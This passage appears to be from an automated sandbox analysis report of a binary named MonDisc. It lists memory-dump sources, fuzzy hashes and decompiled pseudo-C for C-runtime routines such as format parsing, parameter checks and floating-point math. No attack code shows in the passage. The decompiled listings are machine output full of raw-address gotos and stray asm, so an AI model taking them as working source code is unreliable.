                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: Sleep$AcquireCriticalLeaveLockSection
                              • String ID:
                              • API String ID: 1711459333-0
                              • Opcode ID: 8bff635730d18e62b8c5ba54141f2cfb47b45429cdf546357ab3a6131a260e01
                              • Instruction ID: 09a5473a5e9af49e8af6a2d4ca76c840cd3dd0b496ef0919275007a0719e2926
                              • Opcode Fuzzy Hash: 8bff635730d18e62b8c5ba54141f2cfb47b45429cdf546357ab3a6131a260e01
                              • Instruction Fuzzy Hash: 95217F32E0CA8187DB588F28988137C7365FB45B75F141235EA6E826D9CF7CE945CB02
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C913ED0 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ErrorLastVirtual$FreeQuery
                              • String ID:
                              • API String ID: 2187276999-0
                              • Opcode ID: b3dfd8fdebdf336bd3649c607cabc9316637ede27637d673395c608ceccb4a5d
                              • Instruction ID: bc53e9b13fdaa83b3c713f87617b3435433ebed20d3bda400750e55eb9a20c30
                              • Opcode Fuzzy Hash: b3dfd8fdebdf336bd3649c607cabc9316637ede27637d673395c608ceccb4a5d
                              • Instruction Fuzzy Hash: D8117B31F0CB81C2FF618B19B80512966B5FB48BE0F484135E65D92B99DF7CD5908701
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C98DEE4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 153COMMONLIBRARYCODE
                              Download Yara Rule
                              C-Code - Quality: 58%
                              			E00007FF67FF62C98DEE4(void* __edx, signed int __edi, intOrPtr* __rax, long long __rbx, void* __rcx, long long __rdi, void* __rbp, long long _a8, long long _a16) {
				void* _t88;
				signed int _t96;
				signed int _t103;
				signed int _t105;
				char _t107;
				void* _t108;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t134;
				intOrPtr* _t138;
				void* _t140;
				char _t148;
				void* _t153;

				_t154 = __rbp;
				_t134 = __rax;
				_t108 = __edx;
				_a8 = __rbx;
				_a16 = __rdi;
				_t140 = __rcx;
				_t110 = __edi | 0xffffffff;
				if ( *((intOrPtr*)(__rcx + 0x468)) == 0) goto 0x2c98e0e3;
				if (E00007FF67FF62C99AE4C( *((intOrPtr*)(__rcx + 0x468))) == 0) goto 0x2c98e0f3;
				if ( *((long long*)(__rcx + 0x18)) != 0) goto 0x2c98df35;
				E00007FF67FF62C984D84(_t134);
				 *_t134 = 0x16;
				E00007FF67FF62C9C599C();
				goto 0x2c98e0f5;
				 *((intOrPtr*)(__rcx + 0x470)) =  *((intOrPtr*)(__rcx + 0x470)) + 1;
				if ( *((intOrPtr*)(__rcx + 0x470)) == 2) goto 0x2c98e0de;
				 *(__rcx + 0x50) =  *(__rcx + 0x50) & 0x00000000;
				 *(__rcx + 0x2c) =  *(__rcx + 0x2c) & 0x00000000;
				goto 0x2c98e0aa;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 1;
				if ( *((intOrPtr*)(__rcx + 0x28)) < 0) goto 0x2c98e0bf;
				_t148 =  *((char*)(__rcx + 0x41));
				if (_t148 - 0x20 - 0x5a > 0) goto 0x2c98df84;
				goto 0x2c98df86;
				_t96 =  *(0x2ca11bc0 + (_t148 - 0x20) * 8);
				 *(__rcx + 0x2c) = _t96;
				if (_t96 == 8) goto 0x2c98e0e3;
				_t118 = _t96;
				if (_t118 == 0) goto 0x2c98e09e;
				if (_t118 == 0) goto 0x2c98e085;
				if (_t118 == 0) goto 0x2c98e050;
				if (_t118 == 0) goto 0x2c98e025;
				if (_t118 == 0) goto 0x2c98e01c;
				if (_t118 == 0) goto 0x2c98dff0;
				if (_t118 == 0) goto 0x2c98dfe3;
				if (_t96 - 0xfffffffffffffffc != 1) goto 0x2c98e0f3;
				E00007FF67FF62C992418(__rcx, __rcx, _t148, _t153, __rbp);
				goto 0x2c98e0a6;
				E00007FF67FF62C991200(_t148 - 0x20, _t140);
				goto 0x2c98e0a6;
				if (_t108 == 0x2a) goto 0x2c98e006;
				E00007FF67FF62C98D734(_t148 - 0x20, _t140, _t140, _t140 + 0x38, _t154);
				goto 0x2c98e0a6;
				 *((long long*)(_t140 + 0x20)) =  *((long long*)(_t140 + 0x20)) + 8;
				_t103 =  *( *((intOrPtr*)(_t140 + 0x20)) - 8);
				_t104 =  <  ? _t110 : _t103;
				 *(_t140 + 0x38) =  <  ? _t110 : _t103;
				goto 0x2c98e04c;
				 *(_t140 + 0x38) =  *(_t140 + 0x38) & 0x00000000;
				goto 0x2c98e0aa;
				if (_t108 == 0x2a) goto 0x2c98e030;
				goto 0x2c98dff9;
				 *((long long*)(_t140 + 0x20)) =  *((long long*)(_t140 + 0x20)) + 8;
				_t105 =  *( *((intOrPtr*)(_t140 + 0x20)) - 8);
				 *(_t140 + 0x34) = _t105;
				if (_t105 >= 0) goto 0x2c98e04c;
				 *(_t140 + 0x30) =  *(_t140 + 0x30) | 0x00000004;
				 *(_t140 + 0x34) =  ~_t105;
				goto 0x2c98e0a6;
				_t88 = _t108;
				if (_t108 == 0x20) goto 0x2c98e07f;
				if (_t88 == 0x23) goto 0x2c98e079;
				if (_t88 == 0x2b) goto 0x2c98e073;
				if (_t88 == 0x2d) goto 0x2c98e06d;
				if (_t88 != 0x30) goto 0x2c98e0aa;
				 *(_t140 + 0x30) =  *(_t140 + 0x30) | 0x00000008;
				goto 0x2c98e0aa;
				 *(_t140 + 0x30) =  *(_t140 + 0x30) | 0x00000004;
				goto 0x2c98e0aa;
				 *(_t140 + 0x30) =  *(_t140 + 0x30) | 0x00000001;
				goto 0x2c98e0aa;
				 *(_t140 + 0x30) =  *(_t140 + 0x30) | 0x00000020;
				goto 0x2c98e0aa;
				 *(_t140 + 0x30) =  *(_t140 + 0x30) | 0x00000002;
				goto 0x2c98e0aa;
				 *(_t140 + 0x34) =  *(_t140 + 0x34) & 0x00000000;
				 *(_t140 + 0x30) =  *(_t140 + 0x30) & 0x00000000;
				 *(_t140 + 0x3c) =  *(_t140 + 0x3c) & 0x00000000;
				 *((char*)(_t140 + 0x40)) = 0;
				 *(_t140 + 0x38) = _t110;
				 *((char*)(_t140 + 0x54)) = 0;
				goto 0x2c98e0aa;
				if (E00007FF67FF62C9900E4(_t140) == 0) goto 0x2c98e0f3;
				_t138 =  *((intOrPtr*)(_t140 + 0x18));
				_t107 =  *_t138;
				 *((char*)(_t140 + 0x41)) = _t107;
				if (_t107 != 0) goto 0x2c98df5c;
				 *((long long*)(_t140 + 0x18)) =  *((long long*)(_t140 + 0x18)) + 1;
				if ( *((intOrPtr*)(_t140 + 0x2c)) == 0) goto 0x2c98e0cb;
				if ( *((intOrPtr*)(_t140 + 0x2c)) != 7) goto 0x2c98e0e3;
				 *((intOrPtr*)(_t140 + 0x470)) =  *((intOrPtr*)(_t140 + 0x470)) + 1;
				if ( *((intOrPtr*)(_t140 + 0x470)) != 2) goto 0x2c98df4f;
				goto 0x2c98e0f5;
				E00007FF67FF62C984D84(_t138);
				 *_t138 = 0x16;
				E00007FF67FF62C9C599C();
				return _t110;
			}
















                              0x7ff62c98dee4
                              0x7ff62c98dee4
                              0x7ff62c98dee4
                              0x7ff62c98dee4
                              0x7ff62c98dee9
                              0x7ff62c98def4
                              0x7ff62c98def7
                              0x7ff62c98df04
                              0x7ff62c98df11
                              0x7ff62c98df1c
                              0x7ff62c98df1e
                              0x7ff62c98df23
                              0x7ff62c98df29
                              0x7ff62c98df30
                              0x7ff62c98df35
                              0x7ff62c98df42
                              0x7ff62c98df4f
                              0x7ff62c98df53
                              0x7ff62c98df57
                              0x7ff62c98df5c
                              0x7ff62c98df64
                              0x7ff62c98df6a
                              0x7ff62c98df74
                              0x7ff62c98df82
                              0x7ff62c98df8f
                              0x7ff62c98df93
                              0x7ff62c98df99
                              0x7ff62c98df9f
                              0x7ff62c98dfa1
                              0x7ff62c98dfaa
                              0x7ff62c98dfb3
                              0x7ff62c98dfbc
                              0x7ff62c98dfc1
                              0x7ff62c98dfc6
                              0x7ff62c98dfcb
                              0x7ff62c98dfd0
                              0x7ff62c98dfd9
                              0x7ff62c98dfde
                              0x7ff62c98dfe6
                              0x7ff62c98dfeb
                              0x7ff62c98dff3
                              0x7ff62c98dffc
                              0x7ff62c98e001
                              0x7ff62c98e006
                              0x7ff62c98e00f
                              0x7ff62c98e014
                              0x7ff62c98e017
                              0x7ff62c98e01a
                              0x7ff62c98e01c
                              0x7ff62c98e020
                              0x7ff62c98e028
                              0x7ff62c98e02e
                              0x7ff62c98e030
                              0x7ff62c98e039
                              0x7ff62c98e03c
                              0x7ff62c98e041
                              0x7ff62c98e043
                              0x7ff62c98e049
                              0x7ff62c98e04e
                              0x7ff62c98e050
                              0x7ff62c98e055
                              0x7ff62c98e059
                              0x7ff62c98e05d
                              0x7ff62c98e061
                              0x7ff62c98e065
                              0x7ff62c98e067
                              0x7ff62c98e06b
                              0x7ff62c98e06d
                              0x7ff62c98e071
                              0x7ff62c98e073
                              0x7ff62c98e077
                              0x7ff62c98e079
                              0x7ff62c98e07d
                              0x7ff62c98e07f
                              0x7ff62c98e083
                              0x7ff62c98e085
                              0x7ff62c98e089
                              0x7ff62c98e08d
                              0x7ff62c98e091
                              0x7ff62c98e095
                              0x7ff62c98e098
                              0x7ff62c98e09c
                              0x7ff62c98e0a8
                              0x7ff62c98e0aa
                              0x7ff62c98e0ae
                              0x7ff62c98e0b0
                              0x7ff62c98e0b5
                              0x7ff62c98e0bb
                              0x7ff62c98e0c3
                              0x7ff62c98e0c9
                              0x7ff62c98e0cb
                              0x7ff62c98e0d8
                              0x7ff62c98e0e1
                              0x7ff62c98e0e3
                              0x7ff62c98e0e8
                              0x7ff62c98e0ee
                              0x7ff62c98e105

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo
                              • String ID:
                              • API String ID: 3215553584-3916222277
                              • Opcode ID: 32f5ee6cc32af364903e309e24421653fa8da446cabe00959c3228adf4030057
                              • Instruction ID: b5030537f341d675d62111747b55861762c68033ddbab1c7a29fc8ed59e8db36
                              • Opcode Fuzzy Hash: 32f5ee6cc32af364903e309e24421653fa8da446cabe00959c3228adf4030057
                              • Instruction Fuzzy Hash: 58618577D1C286C6EF688F288864B7C37A9EB15BA8F141735C60A872DACF2DD441C603
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C98E5C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 151COMMONLIBRARYCODE
                              Download Yara Rule
                              C-Code - Quality: 52%
                              			E00007FF67FF62C98E5C0(void* __edx, signed int __edi, intOrPtr* __rax, long long __rbx, void* __rcx, long long __rdi, signed int __rsi, void* __rbp, long long _a8, long long _a16, long long _a24) {
				void* _t82;
				intOrPtr _t87;
				signed int _t94;
				signed int _t96;
				char _t98;
				void* _t99;
				signed int _t101;
				intOrPtr _t109;
				void* _t131;
				char _t138;
				signed int _t143;

				_t145 = __rbp;
				_t143 = __rsi;
				_t99 = __edx;
				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __rdi;
				_t101 = __edi | 0xffffffff;
				_t131 = __rcx;
				if ( *((intOrPtr*)(__rcx + 0x468)) == __rsi) goto 0x2c98e7bf;
				if ( *((intOrPtr*)(__rcx + 0x18)) != __rsi) goto 0x2c98e607;
				E00007FF67FF62C984D84(__rax);
				 *__rax = 0x16;
				E00007FF67FF62C9C599C();
				goto 0x2c98e7a9;
				 *((intOrPtr*)(__rcx + 0x470)) =  *((intOrPtr*)(__rcx + 0x470)) + 1;
				if ( *((intOrPtr*)(__rcx + 0x470)) == 2) goto 0x2c98e7a6;
				 *((intOrPtr*)(__rcx + 0x50)) = 0;
				 *((intOrPtr*)(__rcx + 0x2c)) = 0;
				goto 0x2c98e773;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 1;
				if ( *((intOrPtr*)(__rcx + 0x28)) < 0) goto 0x2c98e788;
				_t138 =  *((char*)(__rcx + 0x41));
				if (_t138 - 0x20 - 0x5a > 0) goto 0x2c98e653;
				_t126 = _t138 - 0x20;
				goto 0x2c98e655;
				_t87 =  *((intOrPtr*)(0x2ca11bc0 + (_t138 - 0x20) * 8));
				 *((intOrPtr*)(__rcx + 0x2c)) = _t87;
				if (_t87 == 8) goto 0x2c98e7bf;
				_t109 = _t87;
				if (_t109 == 0) goto 0x2c98e767;
				if (_t109 == 0) goto 0x2c98e753;
				if (_t109 == 0) goto 0x2c98e71e;
				if (_t109 == 0) goto 0x2c98e6f3;
				if (_t109 == 0) goto 0x2c98e6eb;
				if (_t109 == 0) goto 0x2c98e6bf;
				if (_t109 == 0) goto 0x2c98e6b2;
				if (_t87 - 0xfffffffffffffffc != 1) goto 0x2c98e7cf;
				E00007FF67FF62C992BBC(__rcx, __rcx, __rsi, __rbp);
				goto 0x2c98e76f;
				E00007FF67FF62C991650(_t138 - 0x20, _t131);
				goto 0x2c98e76f;
				if (_t99 == 0x2a) goto 0x2c98e6d5;
				E00007FF67FF62C98D920(_t126, _t131, _t131, _t131 + 0x38, _t145);
				goto 0x2c98e76f;
				 *((long long*)(_t131 + 0x20)) =  *((long long*)(_t131 + 0x20)) + 8;
				_t94 =  *( *((intOrPtr*)(_t131 + 0x20)) - 8);
				_t95 =  <  ? _t101 : _t94;
				 *(_t131 + 0x38) =  <  ? _t101 : _t94;
				goto 0x2c98e71a;
				 *(_t131 + 0x38) = 0;
				goto 0x2c98e773;
				if (_t99 == 0x2a) goto 0x2c98e6fe;
				goto 0x2c98e6c8;
				 *((long long*)(_t131 + 0x20)) =  *((long long*)(_t131 + 0x20)) + 8;
				_t96 =  *( *((intOrPtr*)(_t131 + 0x20)) - 8);
				 *(_t131 + 0x34) = _t96;
				if (_t96 >= 0) goto 0x2c98e71a;
				 *(_t131 + 0x30) =  *(_t131 + 0x30) | 0x00000004;
				 *(_t131 + 0x34) =  ~_t96;
				goto 0x2c98e76f;
				_t82 = _t99;
				if (_t99 == 0x20) goto 0x2c98e74d;
				if (_t82 == 0x23) goto 0x2c98e747;
				if (_t82 == 0x2b) goto 0x2c98e741;
				if (_t82 == 0x2d) goto 0x2c98e73b;
				if (_t82 != 0x30) goto 0x2c98e773;
				 *(_t131 + 0x30) =  *(_t131 + 0x30) | 0x00000008;
				goto 0x2c98e773;
				 *(_t131 + 0x30) =  *(_t131 + 0x30) | 0x00000004;
				goto 0x2c98e773;
				 *(_t131 + 0x30) =  *(_t131 + 0x30) | 0x00000001;
				goto 0x2c98e773;
				 *(_t131 + 0x30) =  *(_t131 + 0x30) | 0x00000020;
				goto 0x2c98e773;
				 *(_t131 + 0x30) =  *(_t131 + 0x30) | 0x00000002;
				goto 0x2c98e773;
				 *(_t131 + 0x30) = _t143;
				 *((intOrPtr*)(_t131 + 0x40)) = sil;
				 *(_t131 + 0x38) = _t101;
				 *((intOrPtr*)(_t131 + 0x3c)) = 0;
				 *((intOrPtr*)(_t131 + 0x54)) = sil;
				goto 0x2c98e773;
				if (E00007FF67FF62C990258(_t131) == 0) goto 0x2c98e7cf;
				_t98 =  *((intOrPtr*)( *((intOrPtr*)(_t131 + 0x18))));
				 *((char*)(_t131 + 0x41)) = _t98;
				if (_t98 != 0) goto 0x2c98e62c;
				 *((long long*)(_t131 + 0x18)) =  *((long long*)(_t131 + 0x18)) + 1;
				if ( *((intOrPtr*)(_t131 + 0x2c)) == 0) goto 0x2c98e793;
				if ( *((intOrPtr*)(_t131 + 0x2c)) != 7) goto 0x2c98e7bf;
				 *((intOrPtr*)(_t131 + 0x470)) =  *((intOrPtr*)(_t131 + 0x470)) + 1;
				if ( *((intOrPtr*)(_t131 + 0x470)) != 2) goto 0x2c98e621;
				return  *((intOrPtr*)(_t131 + 0x28));
			}














                              0x7ff62c98e5c0
                              0x7ff62c98e5c0
                              0x7ff62c98e5c0
                              0x7ff62c98e5c0
                              0x7ff62c98e5c5
                              0x7ff62c98e5ca
                              0x7ff62c98e5d5
                              0x7ff62c98e5da
                              0x7ff62c98e5e4
                              0x7ff62c98e5ee
                              0x7ff62c98e5f0
                              0x7ff62c98e5f5
                              0x7ff62c98e5fb
                              0x7ff62c98e602
                              0x7ff62c98e607
                              0x7ff62c98e614
                              0x7ff62c98e621
                              0x7ff62c98e624
                              0x7ff62c98e627
                              0x7ff62c98e62c
                              0x7ff62c98e633
                              0x7ff62c98e639
                              0x7ff62c98e643
                              0x7ff62c98e645
                              0x7ff62c98e651
                              0x7ff62c98e65e
                              0x7ff62c98e662
                              0x7ff62c98e668
                              0x7ff62c98e66e
                              0x7ff62c98e670
                              0x7ff62c98e679
                              0x7ff62c98e682
                              0x7ff62c98e68b
                              0x7ff62c98e690
                              0x7ff62c98e695
                              0x7ff62c98e69a
                              0x7ff62c98e69f
                              0x7ff62c98e6a8
                              0x7ff62c98e6ad
                              0x7ff62c98e6b5
                              0x7ff62c98e6ba
                              0x7ff62c98e6c2
                              0x7ff62c98e6cb
                              0x7ff62c98e6d0
                              0x7ff62c98e6d5
                              0x7ff62c98e6de
                              0x7ff62c98e6e3
                              0x7ff62c98e6e6
                              0x7ff62c98e6e9
                              0x7ff62c98e6eb
                              0x7ff62c98e6ee
                              0x7ff62c98e6f6
                              0x7ff62c98e6fc
                              0x7ff62c98e6fe
                              0x7ff62c98e707
                              0x7ff62c98e70a
                              0x7ff62c98e70f
                              0x7ff62c98e711
                              0x7ff62c98e717
                              0x7ff62c98e71c
                              0x7ff62c98e71e
                              0x7ff62c98e723
                              0x7ff62c98e727
                              0x7ff62c98e72b
                              0x7ff62c98e72f
                              0x7ff62c98e733
                              0x7ff62c98e735
                              0x7ff62c98e739
                              0x7ff62c98e73b
                              0x7ff62c98e73f
                              0x7ff62c98e741
                              0x7ff62c98e745
                              0x7ff62c98e747
                              0x7ff62c98e74b
                              0x7ff62c98e74d
                              0x7ff62c98e751
                              0x7ff62c98e753
                              0x7ff62c98e757
                              0x7ff62c98e75b
                              0x7ff62c98e75e
                              0x7ff62c98e761
                              0x7ff62c98e765
                              0x7ff62c98e771
                              0x7ff62c98e777
                              0x7ff62c98e779
                              0x7ff62c98e77e
                              0x7ff62c98e784
                              0x7ff62c98e78b
                              0x7ff62c98e791
                              0x7ff62c98e793
                              0x7ff62c98e7a0
                              0x7ff62c98e7be

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo
                              • String ID:
                              • API String ID: 3215553584-3916222277
                              • Opcode ID: 2c928c4f2e09d2560ef734e902e10d781059de89a2ae683175d19ecee886b20e
                              • Instruction ID: 01026ffb124fd85dcca06296ca1f9430ef9491fccbbbe7e988da7b4aceed6399
                              • Opcode Fuzzy Hash: 2c928c4f2e09d2560ef734e902e10d781059de89a2ae683175d19ecee886b20e
                              • Instruction Fuzzy Hash: 1B618D7AD0C29286EF648F248C6453C37A9FB45FA8F545335D64EC329ACF28E441C706
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C98E3AC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 149COMMONLIBRARYCODE
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E00007FF67FF62C98E3AC(signed int __edi, intOrPtr* __rax, long long __rbx, void* __rcx, long long __rdi, long long _a8, long long _a16) {

				_a8 = __rbx;
				_a16 = __rdi;
				if ( *((intOrPtr*)(__rcx + 0x468)) != 0) goto 0x2c98e3f1;
				E00007FF67FF62C984D84(__rax);
				 *__rax = 0x16;
				E00007FF67FF62C9C599C();
				return __edi | 0xffffffff;
			}



                              0x7ff62c98e3ac
                              0x7ff62c98e3b1
                              0x7ff62c98e3cc
                              0x7ff62c98e3ce
                              0x7ff62c98e3d3
                              0x7ff62c98e3d9
                              0x7ff62c98e3f0

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo
                              • String ID:
                              • API String ID: 3215553584-3916222277
                              • Opcode ID: 75e27bd1e5ac5c22d5fe14aa161cd81f02e4cf6e2d3a80113d4d31a56978f943
                              • Instruction ID: 990b861c18602e9c6ac39ea76a444488e95763bfeed27832c8a4811a559774a7
                              • Opcode Fuzzy Hash: 75e27bd1e5ac5c22d5fe14aa161cd81f02e4cf6e2d3a80113d4d31a56978f943
                              • Instruction Fuzzy Hash: 7C617676D0C1968AEF648F248864B7D37A9EB15BA8F141335DA0EC72DBDF28E441C602
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C9B5B00 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 133COMMON
                              Download Yara Rule
                              C-Code - Quality: 18%
                              			E00007FF67FF62C9B5B00(signed int __eax, void* __fp0, signed int __r8, signed int __r9) {
				long long _v120;
				long long _v136;
				intOrPtr _v144;
				intOrPtr _v152;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t19;
				void* _t21;
				long long _t25;
				void* _t27;
				signed long long _t29;
				signed long long _t30;
				void* _t31;
				signed long long _t33;
				signed long long _t34;
				signed long long _t36;

				asm("movdqa [esp+0x50], xmm6");
				asm("movdqa [esp+0x60], xmm7");
				_t36 =  *0x2ca16ce0; // 0x7ff0000000000000
				asm("dec cx");
				asm("dec cx");
				_t29 = __r8 &  *0x2ca16d20;
				_t33 = __r9 &  *0x2ca16d20;
				_t13 = _t33 -  *0x2ca16ce0; // 0x7ff0000000000000
				if (_t13 > 0) goto 0x2c9b5db0;
				_t14 = _t29 -  *0x2ca16ce0; // 0x7ff0000000000000
				if (_t14 > 0) goto 0x2c9b5dc0;
				if (_t14 == 0) goto 0x2c9b5d50;
				if (_t33 == 0) goto 0x2c9b5da0;
				if (_t29 == _t33) goto 0x2c9b5d30;
				asm("dec cx");
				asm("dec cx");
				asm("movapd xmm4, xmm0");
				asm("movapd xmm5, xmm1");
				asm("movapd xmm3, [0x611a1]");
				_t30 = _t29 & _t36;
				_t34 = _t33 & _t36;
				asm("dec ecx");
				asm("dec ecx");
				if (_t30 == 0) goto 0x2c9b5ce0;
				if (_t34 == 0) goto 0x2c9b5ce0;
				_t31 = _t30 - _t34;
				_t19 = _t31 - 0x34;
				if (_t19 >= 0) goto 0x2c9b5ce0;
				asm("pand xmm4, xmm3");
				asm("pand xmm5, xmm3");
				asm("comisd xmm4, xmm5");
				if (_t19 <= 0) goto 0x2c9b5dc0;
				if (_t31 == 0x7ff) goto 0x2c9b5d50;
				asm("movapd xmm2, xmm4");
				asm("movapd xmm3, xmm5");
				asm("divsd xmm2, xmm3");
				asm("repne dec esp");
				asm("repne dec ecx");
				asm("dec cx");
				asm("dec ecx");
				_t21 = (_t34 &  *0x2ca16ce0) - 0x3ff + _t34 - 0x3ff - 0x3ff;
				if (_t21 >= 0) goto 0x2c9b5ce0;
				asm("movapd xmm4, [0x610d4]");
				asm("movapd xmm1, xmm5");
				asm("movapd xmm6, xmm2");
				asm("movapd xmm7, xmm2");
				asm("mulsd xmm7, xmm5");
				asm("andpd xmm1, xmm4");
				asm("andpd xmm2, xmm4");
				asm("subsd xmm5, xmm1");
				asm("subsd xmm6, xmm2");
				asm("movapd xmm4, xmm1");
				asm("mulsd xmm4, xmm2");
				asm("subsd xmm4, xmm7");
				asm("mulsd xmm1, xmm6");
				asm("addsd xmm4, xmm1");
				asm("mulsd xmm2, xmm5");
				asm("addsd xmm4, xmm2");
				asm("mulsd xmm6, xmm5");
				asm("addsd xmm6, xmm4");
				asm("movapd xmm1, xmm0");
				asm("pand xmm1, [0x610b4]");
				asm("movapd xmm2, xmm1");
				asm("subsd xmm1, xmm7");
				asm("subsd xmm2, xmm1");
				asm("subsd xmm2, xmm7");
				asm("subsd xmm2, xmm6");
				asm("addsd xmm2, xmm1");
				asm("comisd xmm2, [0x61074]");
				if (_t21 >= 0) goto 0x2c9b5ca0;
				asm("addsd xmm2, xmm3");
				asm("o16 nop [eax+eax]");
				asm("comisd xmm0, [0x61058]");
